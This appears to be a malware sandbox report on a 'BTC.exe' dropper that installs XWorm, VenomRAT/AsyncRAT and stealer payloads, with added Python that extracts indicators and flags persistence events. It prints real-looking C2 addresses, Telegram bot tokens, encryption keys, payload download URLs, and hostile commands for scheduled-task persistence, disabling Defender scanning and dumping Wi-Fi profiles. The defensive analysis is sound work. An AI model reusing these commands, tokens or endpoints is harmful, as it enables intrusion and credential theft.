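     "Install_File": "Windows Security Health Service.exe", "Mutex": "vsvf"},
    {"C2 url": "https://api.telegram.org/bot5904946097:AAEb_US4tHY3ko2z9Y7a20zEv4AtQqZipKM/sendMessage",
     "Telegram Stream": [{"ok": True, "result": {"message_id": 310366,
         "from": {"id": 5904946097, "is_bot": True, "username": "Vilva814bot"},
         "chat": {"id": 5881759996, "username": "flashusdtbtcsender", "type": "private"},
         "text": "This Not RDP"}}]},
]

TELEGRAM_BOT = re.compile(r"https?://api\.telegram\.org/bot(\d+):([A-Za-z0-9_-]+)")


def c2_endpoints(cfg):
    """Normalise the three socket-C2 layouts seen in these configs into 'host:port' strings."""
    pairs = set()
    for item in cfg.get("Host:Port", "").split(";"):          # "ip:port;ip:port;"
        if ":" in item:
            pairs.add(item.strip())
    ports = [p.strip() for p in re.split(r"[,;]", cfg.get("Port") or cfg.get("Ports") or "") if p.strip()]
    hosts = cfg.get("Server") or cfg.get("C2 url")             # csv string or list
    if isinstance(hosts, str) and "://" not in hosts:          # a Telegram URL under "C2 url" is no socket endpoint
        hosts = re.split(r"[,;]", hosts)
    if isinstance(hosts, list):
        pairs.update(f"{h.strip()}:{p}" for h in hosts for p in ports if h.strip())
    return pairs


def telegram_bots(cfg):
    """Bot id, token and chat ids from Telegram URLs and from captured sendMessage replies."""
    bots = {}
    for val in (cfg.get("Telegram URL"), cfg.get("C2 url")):
        m = TELEGRAM_BOT.search(val) if isinstance(val, str) else None
        if m:
            bot = bots.setdefault(m.group(1), {"bot_id": m.group(1),
                                               "token": f"{m.group(1)}:{m.group(2)}", "chat_ids": set()})
            bot["chat_ids"].update(parse_qs(urlsplit(val).query).get("chat_id", []))
    for reply in cfg.get("Telegram Stream", []):               # API responses the bot received at runtime
        result = reply.get("result", {})
        sender = str(result.get("from", {}).get("id", ""))
        if sender in bots and "id" in result.get("chat", {}):
            bots[sender]["chat_ids"].add(str(result["chat"]["id"]))
    return bots


def extract_iocs(configs):
    """Merge every config into one de-duplicated, sorted IOC set."""
    c2, mutexes, names, bots = set(), set(), set(), {}
    for cfg in configs:
        c2 |= c2_endpoints(cfg)
        mutexes.update(v for k, v in cfg.items() if k in ("Mutex", "MutexName"))
        names.update(v for k, v in cfg.items() if k in ("InstallName", "Install file", "Install_File"))
        for bot_id, bot in telegram_bots(cfg).items():
            merged = bots.setdefault(bot_id, bot)
            merged["chat_ids"] |= bot["chat_ids"]
    return {"c2": sorted(c2), "mutexes": sorted(mutexes), "install_names": sorted(names),
            "telegram": [{**b, "chat_ids": sorted(b["chat_ids"])} for b in bots.values()]}


if __name__ == "__main__":
    print(json.dumps(extract_iocs(CONFIGS), indent=2))
```

The five socket endpoints all share port 7812, which is what the "Detected TCP or UDP traffic on non-standard ports" signature is reacting to; the two Telegram bots cannot be blocked by destination address without blocking api.telegram.org itself, so the bot id and token are the indicators worth keeping.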
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_WorldWindStealer | Yara detected WorldWind Stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_XWorm_1 | Yara detected XWorm | Joe Security |

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
  • 0x9372:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x940f:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x9524:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x8ece:$cnc4: POST / HTTP/1.1
C:\Users\user\AppData\Roaming\Cracked.exe | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security |
C:\Users\user\AppData\Roaming\Cracked.exe | INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice | Detects executables attempting to enumerate video devices using WMI | ditekSHen |
  • 0xf8d0:$q1: Select * from Win32_CacheMemory
  • 0xf910:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86}
  • 0xf95e:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
  • 0xf9ac:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
(truncated: the full report lists 53 entries)

Source | Rule | Description | Author | Strings
00000003.00000002.2039417306.0000000003101000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security |
00000007.00000000.2009427541.0000000000F62000.00000002.00000001.01000000.0000000C.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
00000007.00000000.2009427541.0000000000F62000.00000002.00000001.01000000.0000000C.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
  • 0x9172:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x920f:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x9324:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x8cce:$cnc4: POST / HTTP/1.1
00000005.00000000.2006488022.0000000000C73000.00000002.00000001.01000000.0000000A.sdmp | JoeSecurity_WorldWindStealer | Yara detected WorldWind Stealer | Joe Security |
00000005.00000000.2006488022.0000000000C73000.00000002.00000001.01000000.0000000A.sdmp | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security |
(truncated: the full report lists 53 entries)

Source | Rule | Description | Author | Strings
2.0.crack.exe.440000.0.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
2.0.crack.exe.440000.0.unpack | JoeSecurity_Rezlt | Yara detected Rezlt | Joe Security |
0.2.BTC.exe.2c80488.2.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
0.2.BTC.exe.2c80488.2.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
  • 0x7572:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x760f:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x7724:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x70ce:$cnc4: POST / HTTP/1.1
0.2.BTC.exe.2c75848.1.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
(truncated: the full report lists 83 entries)

                            System Summary

Source: File created; Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Users\user\Desktop\BTC.exe, ProcessId: 2796, TargetFilename: C:\Users\user\AppData\Roaming\svchost.exe
Source: Process started; Author: Jonathan Cheong, oscd.community; Data: Command: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Windows Security Health Service" /tr '"C:\Users\user\AppData\Roaming\Windows Security Health Service.exe"' & exit, CommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Windows Security Health Service" /tr '"C:\Users\user\AppData\Roaming\Windows Security Health Service.exe"' & exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\Cracked.exe" , ParentImage: C:\Users\user\AppData\Roaming\Cracked.exe, ParentProcessId: 5524, ParentProcessName: Cracked.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Windows Security Health Service" /tr '"C:\Users\user\AppData\Roaming\Windows Security Health Service.exe"' & exit, ProcessId: 6588, ProcessName: cmd.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true, CommandLine|base64offset|contains: I~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\Window Security.exe" , ParentImage: C:\Users\user\AppData\Roaming\Window Security.exe, ParentProcessId: 2680, ParentProcessName: Window Security.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true, ProcessId: 7476, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali; Data: Command: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\BTC.exe", ParentImage: C:\Users\user\Desktop\BTC.exe, ParentProcessId: 2796, ParentProcessName: BTC.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ProcessId: 1716, ProcessName: svchost.exe
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe, ProcessId: 7140, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Defender Service Host
Source: File created; Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research); Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe, ProcessId: 7140, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Defender Service Host.lnk
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "schtasks" /create /tn "Windows Update" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\Window Security.exe" /rl HIGHEST /f, CommandLine: "schtasks" /create /tn "Windows Update" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\Window Security.exe" /rl HIGHEST /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\Window Security.exe" , ParentImage: C:\Users\user\AppData\Roaming\Window Security.exe, ParentProcessId: 2680, ParentProcessName: Window Security.exe, ProcessCommandLine: "schtasks" /create /tn "Windows Update" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\Window Security.exe" /rl HIGHEST /f, ProcessId: 5800, ProcessName: schtasks.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: schtasks /create /f /sc onlogon /rl highest /tn "Windows Security Health Service" /tr '"C:\Users\user\AppData\Roaming\Windows Security Health Service.exe"' , CommandLine: schtasks /create /f /sc onlogon /rl highest /tn "Windows Security Health Service" /tr '"C:\Users\user\AppData\Roaming\Windows Security Health Service.exe"' , CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Windows Security Health Service" /tr '"C:\Users\user\AppData\Roaming\Windows Security Health Service.exe"' & exit, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6588, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /f /sc onlogon /rl highest /tn "Windows Security Health Service" /tr '"C:\Users\user\AppData\Roaming\Windows Security Health Service.exe"' , ProcessId: 5556, ProcessName: schtasks.exe
Source: File created; Author: Maxime Thiebaut (@0xThiebaut), Tim Shelton (HAWK.IO); Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\svchost.exe, ProcessId: 1716, TargetFilename: C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Pictures\desktop.ini
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\BTC.exe", ParentImage: C:\Users\user\Desktop\BTC.exe, ParentProcessId: 2796, ParentProcessName: BTC.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ProcessId: 1716, ProcessName: svchost.exe
                            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" Get-MpPreference -verbose, CommandLine: "powershell" Get-MpPreference -verbose, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\Window Security.exe" , ParentImage: C:\Users\user\AppData\Roaming\Window Security.exe, ParentProcessId: 2680, ParentProcessName: Window Security.exe, ProcessCommandLine: "powershell" Get-MpPreference -verbose, ProcessId: 5580, ProcessName: powershell.exe
                            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\BTC.exe", ParentImage: C:\Users\user\Desktop\BTC.exe, ParentProcessId: 2796, ParentProcessName: BTC.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ProcessId: 1716, ProcessName: svchost.exe

                            Stealing of Sensitive Information

                            Source: Process started | Author: Joe Security | Data: Command: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\update.exe" , ParentImage: C:\Users\user\AppData\Roaming\update.exe, ParentProcessId: 1632, ParentProcessName: update.exe, ProcessCommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, ProcessId: 7152, ProcessName: cmd.exe
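The Sigma hits above and the Wi-Fi profile dump here are the behaviours a detection engineer would want to catch generically rather than by hash. The following is an added example (not Joe Sandbox or Sigma code) that runs a handful of such rules over process, registry and file events; the event dicts are constructed from the report's own hits, use Sysmon-style field names, and include one benign scheduled-task event as a control.

```python
"""Persistence and credential-access checks for process, registry and file
events of the kind listed in the Sigma section above. Added example, not
Joe Sandbox or Sigma code; the event dicts are constructed from the report's
hits (field names follow Sysmon) plus one benign control."""
import ntpath
import re
from typing import Dict, List, Tuple

Event = Dict[str, str]

# Paths a standard user can write to; a persistence target living here is
# far more suspicious than one under Program Files or System32.
USER_WRITABLE = re.compile(
    r"(?i)\\users\\[^\\]+\\(appdata|desktop|downloads|documents)\\|\\temp\\|\\programdata\\")
# Names of genuine Windows processes that only ever run from C:\Windows.
SYSTEM_NAMES = {"svchost.exe", "explorer.exe", "csrss.exe", "lsass.exe",
                "winlogon.exe", "dllhost.exe", "conhost.exe"}
# Words the dropper used to make its payloads look like OS components.
LURE_WORDS = ("windows", "defender", "security", "update", "microsoft")

# Constructed sample events, taken from the report's Sigma hits (plus one
# benign control at the end).
SAMPLE_EVENTS: List[Event] = [
    {"type": "process", "Image": r"C:\Users\user\AppData\Roaming\svchost.exe",
     "CommandLine": r'"C:\Users\user\AppData\Roaming\svchost.exe"',
     "ParentImage": r"C:\Users\user\Desktop\BTC.exe"},
    {"type": "process", "Image": r"C:\Users\user\AppData\Roaming\Window Security.exe",
     "CommandLine": r'"C:\Users\user\AppData\Roaming\Window Security.exe"',
     "ParentImage": r"C:\Users\user\Desktop\BTC.exe"},
    {"type": "registry", "Image": r"C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe",
     "TargetObject": r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Defender Service Host",
     "Details": r"C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe"},
    {"type": "file", "Image": r"C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe",
     "TargetFilename": r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Defender Service Host.lnk"},
    {"type": "process", "Image": r"C:\Windows\SysWOW64\schtasks.exe",
     "CommandLine": r'"schtasks" /create /tn "Windows Update" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\Window Security.exe" /rl HIGHEST /f',
     "ParentImage": r"C:\Users\user\AppData\Roaming\Window Security.exe"},
    {"type": "process", "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r"""schtasks /create /f /sc onlogon /rl highest /tn "Windows Security Health Service" /tr '"C:\Users\user\AppData\Roaming\Windows Security Health Service.exe"'""",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"type": "process", "Image": r"C:\Windows\SysWOW64\cmd.exe",
     "CommandLine": r'"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All',
     "ParentImage": r"C:\Users\user\AppData\Roaming\update.exe"},
    # Benign control: a daily task whose target lives under Program Files.
    {"type": "process", "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'schtasks /create /tn "Vendor Updater" /sc daily /tr "C:\Program Files\Vendor\update.exe"',
     "ParentImage": r"C:\Program Files\Vendor\setup.exe"},
]


def task_target(cmd: str) -> str:
    """Return the /tr argument of a schtasks command line without its quotes."""
    m = re.search(r"(?i)/tr\s+(.+?)(?=\s+/[a-z]+\b|\s*$)", cmd)
    return m.group(1).strip(" '\"") if m else ""


def analyze(events: List[Event]) -> List[Tuple[str, str]]:
    """Return (rule_name, evidence) pairs for every rule an event trips."""
    hits: List[Tuple[str, str]] = []
    for ev in events:
        img = ev.get("Image", "")
        name = ntpath.basename(img).lower()
        cmd = ev.get("CommandLine", "")
        if ev.get("type") == "process":
            # svchost.exe and friends never legitimately run from a profile dir.
            if name in SYSTEM_NAMES and not img.lower().startswith("c:\\windows\\"):
                hits.append(("system_binary_name_outside_windows_dir", img))
            # "Window Security.exe" in %AppData% is a lookalike, not a component.
            if USER_WRITABLE.search(img) and any(w in name for w in LURE_WORDS):
                hits.append(("lure_named_binary_in_user_profile", img))
            # Logon-triggered / highest-privilege task pointing into the profile.
            if name == "schtasks.exe" and re.search(r"(?i)/create\b", cmd):
                target = task_target(cmd)
                autorun = re.search(r"(?i)/sc\s+onlogon|/rl\s+highest", cmd)
                if autorun and USER_WRITABLE.search(target):
                    hits.append(("schtasks_autorun_from_user_profile", target))
            # netsh wlan show profile lists saved Wi-Fi networks; with
            # "key=clear" it also prints the stored PSK.
            if re.search(r"(?i)netsh\s+wlan\s+show\s+profile", cmd):
                hits.append(("wifi_profile_enumeration", cmd))
        if (re.search(r"(?i)\\currentversion\\run\\", ev.get("TargetObject", ""))
                and USER_WRITABLE.search(ev.get("Details", ""))):
            hits.append(("run_key_to_user_profile_binary", ev["TargetObject"]))
        if re.search(r"(?i)\\start menu\\programs\\startup\\[^\\]+\.lnk$",
                     ev.get("TargetFilename", "")):
            hits.append(("startup_folder_lnk_created", ev["TargetFilename"]))
    return hits


if __name__ == "__main__":
    for rule, evidence in analyze(SAMPLE_EVENTS):
        print(f"{rule:40} {evidence}")
```

Every malicious event in the sample trips exactly one rule and the benign task trips none; in production the same logic would sit in a SIEM query, but the path and argument checks are the part that transfers unchanged.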
                            Suricata IDS alerts (timestamp, SID, severity, source port -> destination port, protocol, classtype):
                            2024-09-03T06:15:58.964537+0200  SID 2049872  Severity 1  49705 -> 443   TCP  A Network Trojan was detected
                            2024-09-03T06:15:58.964613+0200  SID 2045614  Severity 1  443 -> 49705   TCP  A Network Trojan was detected
                            2024-09-03T06:16:41.916861+0200  SID 2031009  Severity 1  49728 -> 443   TCP  Malware Command and Control Activity Detected
                            2024-09-03T06:16:41.916861+0200  SID 2044766  Severity 1  49728 -> 443   TCP  A Network Trojan was detected
                            2024-09-03T06:15:58.451017+0200  SID 2036383  Severity 1  49706 -> 80    TCP  A Network Trojan was detected
                            2024-09-03T06:16:42.593395+0200  SID 2803305  Severity 3  49730 -> 443   TCP  Unknown Traffic
                            2024-09-03T06:16:41.704665+0200  SID 2031009  Severity 1  49729 -> 443   TCP  Malware Command and Control Activity Detected
                            2024-09-03T06:16:41.704665+0200  SID 2044766  Severity 1  49729 -> 443   TCP  A Network Trojan was detected
                            2024-09-03T06:16:39.987059+0200  SID 2855924  Severity 1  49719 -> 7812  TCP  Malware Command and Control Activity Detected
                            2024-09-03T06:16:04.017776+0200  SID 2036383  Severity 1  49707 -> 80    TCP  A Network Trojan was detected
                            2024-09-03T06:16:48.962020+0200  SID 2044557  Severity 1  49734 -> 443   TCP  A Network Trojan was detected
                            2024-09-03T06:16:42.985167+0200  SID 2803305  Severity 3  49731 -> 443   TCP  Unknown Traffic
                            2024-09-03T06:16:05.473252+0200  SID 2853685  Severity 1  49708 -> 443   TCP  A Network Trojan was detected


                            AV Detection

                            Source: BTC.exe | Avira: detected
                            Source: https://payloads-poison.000webhostapp.com/r77-x86.dll | Avira URL Cloud: Label: phishing
                            Source: https://payloads-poison.000webhostapp.com/r77-x64.dll | Avira URL Cloud: Label: phishing
                            Source: http://payloads-poison.000webhostapp.com | Avira URL Cloud: Label: phishing
                            Source: https://payloads-poison.000webhostapp.com/r77-x64.dllkhttps://payloads-poison.000webhostapp.com/r77- | Avira URL Cloud: Label: phishing
                            Source: https://payloads-poison.000webhostapp.com | Avira URL Cloud: Label: phishing
                            Source: http://us-east-1.route-1.000webhost.awex.io | Avira URL Cloud: Label: malware
                            Source: 00000003.00000002.2039417306.0000000003101000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: VenomRAT {"Server": "185.252.232.158,64.23.232.116", "Ports": "7812", "Version": "Venom RAT + HVNC + Stealer + Grabber v6.0.3", "Autorun": "true", "Install_Folder": "%AppData%", "Install_File": "Windows Security Health Service.exe", "AES_key": "U7UKNtJ34LgchwZODOfzzFcHW2nq5BGM", "Mutex": "vsvf", "Certificate": "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", "ServerSignature": "MB7+7eQe3o/mr34a8NEaPDlYEbTJe3GITCSUNhGbTCbTlGn/dXnmzv6/FdZSuAlv0XJWcYHF/Q7TuCeusJI910cY/I6m4fHm3HdMCvzVYKl83ynyD0SsNszljpqC1g/jNVcnhSAOQSUOWT6s3TKuQxwrW62ZBFDfFXrylSK+fdM=", "External_config_on_Pastebin": "null", "BDOS": "true", "Startup_Delay": "1", "Group": "Default", "AntiProcess": "true", "AntiVM": "false"}
                            Source: 00000003.00000002.2039417306.0000000003101000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: AsyncRAT {"Server": "185.252.232.158,64.23.232.116", "Ports": "7812", "Version": "Venom RAT + HVNC + Stealer + Grabber v6.0.3", "Autorun": "true", "Install_Folder": "%AppData%", "Install_File": "Windows Security Health Service.exe", "AES_key": "U7UKNtJ34LgchwZODOfzzFcHW2nq5BGM", "Mutex": "vsvf", "Certificate": "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", "ServerSignature": "MB7+7eQe3o/mr34a8NEaPDlYEbTJe3GITCSUNhGbTCbTlGn/dXnmzv6/FdZSuAlv0XJWcYHF/Q7TuCeusJI910cY/I6m4fHm3HdMCvzVYKl83ynyD0SsNszljpqC1g/jNVcnhSAOQSUOWT6s3TKuQxwrW62ZBFDfFXrylSK+fdM=", "External_config_on_Pastebin": "null", "BDOS": "true", "Startup_Delay": "1", "Group": "Default", "AntiProcess": "true", "AntiVM": "false"}
                            Source: 00000000.00000002.2010752692.0000000002C51000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Xworm {"C2 url": ["146.190.29.250", "165.227.91.90", "167.99.94.206"], "Port": "7812", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.2", "Telegram URL": "https://api.telegram.org/bot7074211690:AAFHdtGIEk1j3FpHjh6_p8Xjh9rfZDo4uSc/sendMessage?chat_id=6291749148"}
                            Source: 6.0.Window Security.exe.ce0000.0.unpack | Malware Configuration Extractor: Vermin Keylogger {"Version": "2.1.0.0", "Host:Port": "146.190.29.250:7812;", "SubDirectory": "SubDir34", "InstallName": "Windows Security.exe", "MutexName": "VNM_MUTEX_h1gQxrpyccCFZq7JPS", "StartupKey": "Windows Update", "Tag": "Office04", "LogDirectoryName": "Logs"}
                            Source: crack.exe.5972.2.memstrmin | Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot5904946097:AAEb_US4tHY3ko2z9Y7a20zEv4AtQqZipKM/sendMessage", "Telegram Stream": [{"ok": true, "result": {"message_id": 310366, "from": {"id": 5904946097, "is_bot": true, "first_name": "Vilva789", "username": "Vilva814bot"}, "chat": {"id": 5881759996, "first_name": "BTC USDT", "last_name": "FLASH\ud83d\udd25", "username": "flashusdtbtcsender", "type": "private"}, "date": 1725336958, "text": "This Not RDP"}}]}
                            Source: payloads-poison.000webhostapp.com | Virustotal: Detection: 14%
                            Source: http://91.134.207.16/svchost.exe | Virustotal: Detection: 10%
                            Source: https://payloads-poison.000webhostapp.com/r77-x86.dll | Virustotal: Detection: 7%
                            Source: http://91.134.207.16/WinSCP.com | Virustotal: Detection: 7%
                            Source: http://91.134.207.16/ngrok.exe | Virustotal: Detection: 8%
                            Source: http://91.134.207.16/Install.exe | Virustotal: Detection: 11%
                            Source: http://91.134.207.16/autoupdate1.exe | Virustotal: Detection: 12%
                            Source: http://91.134.207.16/rdpinstall.exe | Virustotal: Detection: 10%
                            Source: http://91.134.207.16/update.exe | Virustotal: Detection: 11%
                            Source: C:\Users\user\AppData\Roaming\Cracked.exe | ReversingLabs: Detection: 86%
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe | ReversingLabs: Detection: 100%
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe | ReversingLabs: Detection: 100%
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe | ReversingLabs: Detection: 81%
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exe | ReversingLabs: Detection: 86%
                            Source: C:\Users\user\AppData\Roaming\crack.exe | ReversingLabs: Detection: 91%
                            Source: C:\Users\user\AppData\Roaming\svchost.exe | ReversingLabs: Detection: 100%
                            Source: C:\Users\user\AppData\Roaming\update.exe | ReversingLabs: Detection: 95%
                            Source: BTC.exe | Virustotal: Detection: 63%
                            Source: Yara match | File source: 6.0.Window Security.exe.d0809a.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 6.0.Window Security.exe.d05295.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 6.0.Window Security.exe.ce0000.0.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                            Source: Yara match | File source: C:\Users\user\AppData\Roaming\Window Security.exe, type: DROPPED
                            Source: Yara match | File source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, type: DROPPED
                            Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
                            Source: BTC.exe | Joe Sandbox ML: detected
                            Source: 0.2.BTC.exe.2c80488.2.raw.unpack | String decryptor: 146.190.29.250,165.227.91.90,167.99.94.206
                            Source: 0.2.BTC.exe.2c80488.2.raw.unpack | String decryptor: 7812
                            Source: 0.2.BTC.exe.2c80488.2.raw.unpack | String decryptor: <123456789>
                            Source: 0.2.BTC.exe.2c80488.2.raw.unpack | String decryptor: <Xwormmm>
                            Source: 0.2.BTC.exe.2c80488.2.raw.unpack | String decryptor: XWorm V5.2
